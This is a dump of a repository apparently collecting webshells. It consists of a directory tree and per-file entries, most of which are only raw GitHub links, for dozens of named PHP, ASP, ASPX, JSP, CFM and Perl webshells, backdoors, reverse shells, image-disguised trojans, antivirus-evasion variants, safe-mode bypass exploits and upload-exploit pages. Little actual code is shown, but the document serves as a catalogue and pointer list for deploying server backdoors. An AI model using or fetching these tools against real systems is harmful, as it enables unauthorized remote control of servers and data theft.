├── Php ├── c999shell.php ├── phpinfo.php ├── 中转bypass │ ├── 一句话.php │ └── 本地连接这个.php ├── 图片一句话 │ ├── JFIF.php │ ├── 404.jpg │ ├── 404.php │ ├── 图片马.jpg │ ├── gif89a.jpg │ └── gif89a.php ├── 529.php ├── Dx.php ├── NGH.php ├── cw.php ├── erne.php ├── kral.php ├── 上传马.php ├── 图片马.jpg ├── PHVayv.php ├── angel.php ├── fatal.php ├── gfs_sh.php ├── nshell.php ├── stres.php ├── tryag.php ├── CasuS 1.5.php ├── PH Vayv.php ├── PHANTASMA.php ├── PH_Vayv.php ├── SPS-3.0免杀.php ├── ex0shell.php ├── iMHaPFtp.php ├── license.zip ├── myshell.php ├── nsT View.php ├── rootshell.php ├── safe0ver.php ├── sosyete.php ├── Cyber Shell.php ├── Sincap 1.0.php ├── cybershell.php ├── load_shell.php ├── r57shell127.php ├── NTDaddy v1.9.php ├── PHPJackal v1.5.php ├── PHPRemoteView.php ├── aZRaiLPhp v1.0.php ├── aZRaiLPhp_v1.0.php ├── udf.dll 专用网马.php ├── www.zjjv.com.php ├── 仗剑孤行搜索可读可写目录脚本.php ├── CrystalShell v.1.php ├── KA_uShell 0.1.6.php ├── PhpSpy Ver 2006.php ├── SnIpEr_SA Shell.php ├── accept_language.php ├── Cyber Shell (v 1.0).php ├── EgY_SpIdEr ShElL V2.php ├── Loaderz WEB Shell.php ├── NetworkFileManagerPHP.php ├── s72 Shell v1.1 Coding.php ├── s72_Shell_v1.1_Coding.php ├── Shell [ci] .Biz was here.php ├── PHP-Shell-Detector-master.zip ├── Spider PHP Shell (SPS-3.0).php ├── KAdot Universal Shell v0.1.6.php ├── KAdot_Universal_Shell_v0.1.6.php ├── Silic Group php Webshell v3.php ├── GFS web-shell ver 3.1.7 - PRiV8.php ├── GFS_web-shell_ver_3.1.7_-_PRiV8.php ├── Antichat Shell. Modified by Go0o$E.php ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.php ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt ├── Adminer - Compact database management.php ├── Silic Group Hacker Army - BlackBap.Org.php ├── AK-74 Security Team Web Shell Beta Version.php ├── Safe0ver Shell -Safe Mod Bypass By Evilc0der.php ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php ├── blackbin │ ├── v1 │ │ ├── readme.md │ │ └── make2.php │ └── 404super.php ├── ZyklonShell.php ├── Uploader.php ├── simple-backdoor.php ├── simple_cmd.php ├── Simple_PHP_backdoor_by_DK.php ├── Non-alphanumeric.php ├── ru24_post_sh.php ├── wordpress backdoor.txt ├── README.md ├── pws.php ├── Uploading.php ├── pHpINJ.php ├── Worse Linux Shell.php ├── h4ntu shell [powered by tsoi].php ├── h4ntu_shell_[powered_by_tsoi].php ├── NCC-Shell.php ├── lamashell.php ├── bdshell.php ├── php-backdoor.php ├── Password Hasher for PHP Shell 2.1.php ├── ftpsearch.php ├── php-findsock-shell.php ├── matamu.php ├── WinX Shell.php ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php ├── Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php ├── SimShell 1.0 - Simorgh Security MGZ.php ├── SimShell_1.0_-_Simorgh_Security_MGZ.php ├── php-reverse-shell.php ├── Dive Shell 1.0 - Emperor Hacking Team.php ├── Dive_Shell_1.0_Emperor_Hacking_Team.php ├── hiddens shell v1.php └── backupsql.php ├── README.md ├── 一句话 ├── 合成图片马命令.txt ├── Asp_Aspx_Php_By_HUC.jpg └── Asp_Aspx_Php_ By_TNT.JPG ├── Cfm ├── devshell.md └── devshell.cfm ├── File include Bypass ├── includer.php ├── litteryixx.ASP ├── litteryi.txt └── includer.txt ├── Asp ├── DJ团队.asp ├── 上传小马.asp ├── 不灭之魂.asp ├── 小红帽.asp ├── 炽天使.asp ├── 目录扫描.asp ├── mssql.asp ├── radhat.asp ├── TNTHK加密小马.asp ├── Web Shell.asp ├── ZehirIV.asp ├── h4ck_Door.asp ├── 图片一句话 │ ├── img.asp │ ├── JFIF.asp │ ├── gif87a.asp │ └── gif89a.asp ├── 小强asp木马.asp ├── 目录扫描读写马.asp ├── 虚拟机主机提权大马.asp ├── 08小组内部交流专用.asp ├── 传说中的草泥马4.0.asp ├── 旁注 - 网站小助手.asp ├── 木马帮V1.1-火舌版.asp ├── 草莓webshell.asp ├── RedHat Hacker.asp ├── r00ts小组过防火墙马.asp ├── upfile_write.asp ├── Remote Explorer.asp ├── JspWebShell By 绝对零度.asp ├── STHx 渗透小组专用 ASP小马.asp ├── 红狼ASP木马--Anfly免杀版.asp ├── Aventis KlasVayv 1.0.asp ├── I.N.F HACKING CENTER.asp ├── KOA ASP类 WebShell扫描工具.asp ├── RedHat Hacker.asp明文版.asp ├── 80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一.asp ├── RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer.asp ├── Welcome To AK Team.asp └── CmdAsp.asp ├── Other ├── File include Bypass │ ├── includer.php │ ├── litteryixx.ASP │ ├── litteryi.txt │ └── includer.txt ├── acat │ ├── ACat.jar │ ├── ACat-src.zip │ ├── ACat-附数据库驱动.jar │ ├── ACat_jdk1.5.jar │ ├── ACat-附数据库驱动-jdk1.5.jar │ └── readme.md ├── Axis2Shell │ ├── config.aar │ ├── README.md │ └── Utils.java ├── jdk1.3webshell │ ├── test.ear │ ├── test.war │ └── readme.MD └── cat.aar │ ├── axis2 利用小工具cat.pdf │ ├── axis2 利用小工具cat.aar.zip │ └── Readme.md ├── Aspx ├── 国外牛逼大马.aspx ├── Code by Bin.aspx ├── ASPX小马 - 黑兵社团.aspx ├── 凝聚科技专用AspX大马 Bysunue.aspx ├── WebSniff 1.0 Powered by C.C.T.aspx ├── MYSQL Manager -Asp.net Silic Group Hacker Army专用版本.aspx ├── 上传马.aspx ├── ASPX one line Code Client by amxku.aspx ├── Command.aspx ├── SQL.aspx ├── fileupload.aspx └── Antak Webshell.aspx ├── Jsp ├── jspspy_k8.jsp ├── JFoler 1.0.jsp ├── Jsp反弹shell.txt ├── Silic Group.jsp ├── 园长-jsp │ ├── cat.jar │ ├── 使用说明.txt │ ├── cat.Jpg │ └── cat.jspx ├── Mysql Database.jsp ├── jshell ver 0.1.jsp ├── JspDo Code By Xiao.3.jsp ├── Jspspy web~shell V1.0 ※MADE by 孤水绕城 QQ540410588.jsp ├── 新型JSP小马支持上传任意格式文件.jsp ├── 带回显执行cmd.jsp ├── 上传小马.jsp ├── Command Execution (win32).jsp ├── 小马.jsp ├── hahahaha小马.JSp ├── Oracle Database.jsp └── 一句话 │ └── caidao.jsp ├── Pl ├── Cgitelnet.pl └── GO.cgi.pl ├── 同时上传图片和马的上传利用页面.html ├── Nginx └── pwnginx-master.zip ├── ewebedtior编辑器本地构造上传漏洞利用代码.html ├── 构造的上传.html ├── FCKeditor编辑器本地构造的上传.html ├── asp.ashx ├── cmd.jsp ├── Mysql └── mysql_audit_plugin │ ├── README.md │ ├── audit_null.patch │ └── audit_null.c └── C# └── findsock.c /Php/c999shell.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Php/phpinfo.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Php/中转bypass/一句话.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Php/图片一句话/JFIF.php: -------------------------------------------------------------------------------- 1 | JFIF  2 | 3 | -------------------------------------------------------------------------------- /Asp/DJ团队.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/DJ团队.asp -------------------------------------------------------------------------------- /Asp/上传小马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/上传小马.asp -------------------------------------------------------------------------------- /Asp/不灭之魂.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/不灭之魂.asp -------------------------------------------------------------------------------- /Asp/小红帽.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/小红帽.asp -------------------------------------------------------------------------------- /Asp/炽天使.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/炽天使.asp -------------------------------------------------------------------------------- /Asp/目录扫描.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/目录扫描.asp -------------------------------------------------------------------------------- /Other/File include Bypass/includer.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Php/529.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/529.php -------------------------------------------------------------------------------- /Php/Dx.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Dx.php -------------------------------------------------------------------------------- /Php/NGH.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/NGH.php -------------------------------------------------------------------------------- /Php/cw.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/cw.php -------------------------------------------------------------------------------- /Php/erne.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/erne.php -------------------------------------------------------------------------------- /Php/kral.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/kral.php -------------------------------------------------------------------------------- /Php/上传马.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/上传马.php -------------------------------------------------------------------------------- /Php/图片马.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/图片马.jpg -------------------------------------------------------------------------------- /Asp/mssql.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/mssql.asp -------------------------------------------------------------------------------- /Asp/radhat.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/radhat.asp -------------------------------------------------------------------------------- /Php/PHVayv.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PHVayv.php -------------------------------------------------------------------------------- /Php/angel.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/angel.php -------------------------------------------------------------------------------- /Php/fatal.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/fatal.php -------------------------------------------------------------------------------- /Php/gfs_sh.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/gfs_sh.php -------------------------------------------------------------------------------- /Php/nshell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/nshell.php -------------------------------------------------------------------------------- /Php/stres.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/stres.php -------------------------------------------------------------------------------- /Php/tryag.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/tryag.php -------------------------------------------------------------------------------- /Asp/TNTHK加密小马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/TNTHK加密小马.asp -------------------------------------------------------------------------------- /Asp/Web Shell.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/Web Shell.asp -------------------------------------------------------------------------------- /Asp/ZehirIV.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/ZehirIV.asp -------------------------------------------------------------------------------- /Asp/h4ck_Door.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/h4ck_Door.asp -------------------------------------------------------------------------------- /Asp/图片一句话/img.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/图片一句话/img.asp -------------------------------------------------------------------------------- /Asp/小强asp木马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/小强asp木马.asp -------------------------------------------------------------------------------- /Asp/目录扫描读写马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/目录扫描读写马.asp -------------------------------------------------------------------------------- /Asp/虚拟机主机提权大马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/虚拟机主机提权大马.asp -------------------------------------------------------------------------------- /Aspx/国外牛逼大马.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Aspx/国外牛逼大马.aspx -------------------------------------------------------------------------------- /Cfm/devshell.cfm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Cfm/devshell.cfm -------------------------------------------------------------------------------- /Jsp/jspspy_k8.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/jspspy_k8.jsp -------------------------------------------------------------------------------- /Php/CasuS 1.5.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/CasuS 1.5.php -------------------------------------------------------------------------------- /Php/PH Vayv.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PH Vayv.php -------------------------------------------------------------------------------- /Php/PHANTASMA.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PHANTASMA.php -------------------------------------------------------------------------------- /Php/PH_Vayv.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PH_Vayv.php -------------------------------------------------------------------------------- /Php/SPS-3.0免杀.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/SPS-3.0免杀.php -------------------------------------------------------------------------------- /Php/ex0shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/ex0shell.php -------------------------------------------------------------------------------- /Php/iMHaPFtp.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/iMHaPFtp.php -------------------------------------------------------------------------------- /Php/license.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/license.zip -------------------------------------------------------------------------------- /Php/myshell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/myshell.php -------------------------------------------------------------------------------- /Php/nsT View.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/nsT View.php -------------------------------------------------------------------------------- /Php/rootshell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/rootshell.php -------------------------------------------------------------------------------- /Php/safe0ver.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/safe0ver.php -------------------------------------------------------------------------------- /Php/sosyete.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/sosyete.php -------------------------------------------------------------------------------- /Php/图片一句话/404.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/图片一句话/404.jpg -------------------------------------------------------------------------------- /Php/图片一句话/404.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/图片一句话/404.php -------------------------------------------------------------------------------- /Php/图片一句话/图片马.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/图片一句话/图片马.jpg -------------------------------------------------------------------------------- /Pl/Cgitelnet.pl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Pl/Cgitelnet.pl -------------------------------------------------------------------------------- /Asp/08小组内部交流专用.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/08小组内部交流专用.asp -------------------------------------------------------------------------------- /Asp/传说中的草泥马4.0.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/传说中的草泥马4.0.asp -------------------------------------------------------------------------------- /Asp/图片一句话/JFIF.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/图片一句话/JFIF.asp -------------------------------------------------------------------------------- /Asp/旁注 - 网站小助手.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/旁注 - 网站小助手.asp -------------------------------------------------------------------------------- /Asp/木马帮V1.1-火舌版.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/木马帮V1.1-火舌版.asp -------------------------------------------------------------------------------- /Asp/草莓webshell.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/草莓webshell.asp -------------------------------------------------------------------------------- /Jsp/JFoler 1.0.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/JFoler 1.0.jsp -------------------------------------------------------------------------------- /Jsp/Jsp反弹shell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/Jsp反弹shell.txt -------------------------------------------------------------------------------- /Jsp/Silic Group.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/Silic Group.jsp -------------------------------------------------------------------------------- /Jsp/园长-jsp/cat.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/园长-jsp/cat.jar -------------------------------------------------------------------------------- /Jsp/园长-jsp/使用说明.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/园长-jsp/使用说明.txt -------------------------------------------------------------------------------- /Other/acat/ACat.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/acat/ACat.jar -------------------------------------------------------------------------------- /Php/Cyber Shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Cyber Shell.php -------------------------------------------------------------------------------- /Php/Sincap 1.0.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Sincap 1.0.php -------------------------------------------------------------------------------- /Php/cybershell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/cybershell.php -------------------------------------------------------------------------------- /Php/load_shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/load_shell.php -------------------------------------------------------------------------------- /Php/r57shell127.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/r57shell127.php -------------------------------------------------------------------------------- /Asp/RedHat Hacker.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/RedHat Hacker.asp -------------------------------------------------------------------------------- /Asp/r00ts小组过防火墙马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/r00ts小组过防火墙马.asp -------------------------------------------------------------------------------- /Asp/upfile_write.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/upfile_write.asp -------------------------------------------------------------------------------- /Asp/图片一句话/gif87a.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/图片一句话/gif87a.asp -------------------------------------------------------------------------------- /Asp/图片一句话/gif89a.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/图片一句话/gif89a.asp -------------------------------------------------------------------------------- /Aspx/Code by Bin.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Aspx/Code by Bin.aspx -------------------------------------------------------------------------------- /Jsp/Mysql Database.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/Mysql Database.jsp -------------------------------------------------------------------------------- /Jsp/jshell ver 0.1.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/jshell ver 0.1.jsp -------------------------------------------------------------------------------- /Php/NTDaddy v1.9.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/NTDaddy v1.9.php -------------------------------------------------------------------------------- /Php/PHPJackal v1.5.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PHPJackal v1.5.php -------------------------------------------------------------------------------- /Php/PHPRemoteView.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PHPRemoteView.php -------------------------------------------------------------------------------- /Php/aZRaiLPhp v1.0.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/aZRaiLPhp v1.0.php -------------------------------------------------------------------------------- /Php/aZRaiLPhp_v1.0.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/aZRaiLPhp_v1.0.php -------------------------------------------------------------------------------- /Php/udf.dll 专用网马.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/udf.dll 专用网马.php -------------------------------------------------------------------------------- /Php/www.zjjv.com.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/www.zjjv.com.php -------------------------------------------------------------------------------- /Php/仗剑孤行搜索可读可写目录脚本.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/仗剑孤行搜索可读可写目录脚本.php -------------------------------------------------------------------------------- /Php/图片一句话/gif89a.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/图片一句话/gif89a.jpg -------------------------------------------------------------------------------- /Php/图片一句话/gif89a.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/图片一句话/gif89a.php -------------------------------------------------------------------------------- /同时上传图片和马的上传利用页面.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/同时上传图片和马的上传利用页面.html -------------------------------------------------------------------------------- /Asp/Remote Explorer.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/Remote Explorer.asp -------------------------------------------------------------------------------- /Aspx/ASPX小马 - 黑兵社团.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Aspx/ASPX小马 - 黑兵社团.aspx -------------------------------------------------------------------------------- /Nginx/pwnginx-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Nginx/pwnginx-master.zip -------------------------------------------------------------------------------- /Other/acat/ACat-src.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/acat/ACat-src.zip -------------------------------------------------------------------------------- /Php/CrystalShell v.1.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/CrystalShell v.1.php -------------------------------------------------------------------------------- /Php/KA_uShell 0.1.6.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/KA_uShell 0.1.6.php -------------------------------------------------------------------------------- /Php/PhpSpy Ver 2006.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PhpSpy Ver 2006.php -------------------------------------------------------------------------------- /Php/SnIpEr_SA Shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/SnIpEr_SA Shell.php -------------------------------------------------------------------------------- /Php/accept_language.php: -------------------------------------------------------------------------------- 1 | by q1w2e3r4'; ?> 2 | -------------------------------------------------------------------------------- /Php/中转bypass/本地连接这个.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/中转bypass/本地连接这个.php -------------------------------------------------------------------------------- /Asp/JspWebShell By 绝对零度.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/JspWebShell By 绝对零度.asp -------------------------------------------------------------------------------- /Asp/STHx 渗透小组专用 ASP小马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/STHx 渗透小组专用 ASP小马.asp -------------------------------------------------------------------------------- /Asp/红狼ASP木马--Anfly免杀版.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/红狼ASP木马--Anfly免杀版.asp -------------------------------------------------------------------------------- /Other/Axis2Shell/config.aar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/Axis2Shell/config.aar -------------------------------------------------------------------------------- /Other/acat/ACat-附数据库驱动.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/acat/ACat-附数据库驱动.jar -------------------------------------------------------------------------------- /Other/acat/ACat_jdk1.5.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/acat/ACat_jdk1.5.jar -------------------------------------------------------------------------------- /Php/Cyber Shell (v 1.0).php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Cyber Shell (v 1.0).php -------------------------------------------------------------------------------- /Php/EgY_SpIdEr ShElL V2.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/EgY_SpIdEr ShElL V2.php -------------------------------------------------------------------------------- /Php/Loaderz WEB Shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Loaderz WEB Shell.php -------------------------------------------------------------------------------- /一句话/Asp_Aspx_Php_By_HUC.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/一句话/Asp_Aspx_Php_By_HUC.jpg -------------------------------------------------------------------------------- /Asp/Aventis KlasVayv 1.0.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/Aventis KlasVayv 1.0.asp -------------------------------------------------------------------------------- /Asp/I.N.F HACKING CENTER.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/I.N.F HACKING CENTER.asp -------------------------------------------------------------------------------- /Asp/KOA ASP类 WebShell扫描工具.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/KOA ASP类 WebShell扫描工具.asp -------------------------------------------------------------------------------- /Asp/RedHat Hacker.asp明文版.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/RedHat Hacker.asp明文版.asp -------------------------------------------------------------------------------- /Jsp/JspDo Code By Xiao.3.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/JspDo Code By Xiao.3.jsp -------------------------------------------------------------------------------- /Other/jdk1.3webshell/test.ear: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/jdk1.3webshell/test.ear -------------------------------------------------------------------------------- /Other/jdk1.3webshell/test.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/jdk1.3webshell/test.war -------------------------------------------------------------------------------- /Php/NetworkFileManagerPHP.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/NetworkFileManagerPHP.php -------------------------------------------------------------------------------- /Php/s72 Shell v1.1 Coding.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/s72 Shell v1.1 Coding.php -------------------------------------------------------------------------------- /Php/s72_Shell_v1.1_Coding.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/s72_Shell_v1.1_Coding.php -------------------------------------------------------------------------------- /一句话/Asp_Aspx_Php_ By_TNT.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/一句话/Asp_Aspx_Php_ By_TNT.JPG -------------------------------------------------------------------------------- /Aspx/凝聚科技专用AspX大马 Bysunue.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Aspx/凝聚科技专用AspX大马 Bysunue.aspx -------------------------------------------------------------------------------- /File include Bypass/litteryi.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/File include Bypass/litteryi.txt -------------------------------------------------------------------------------- /Other/cat.aar/axis2 利用小工具cat.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/cat.aar/axis2 利用小工具cat.pdf -------------------------------------------------------------------------------- /Php/Shell [ci] .Biz was here.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Shell [ci] .Biz was here.php -------------------------------------------------------------------------------- /ewebedtior编辑器本地构造上传漏洞利用代码.html: -------------------------------------------------------------------------------- 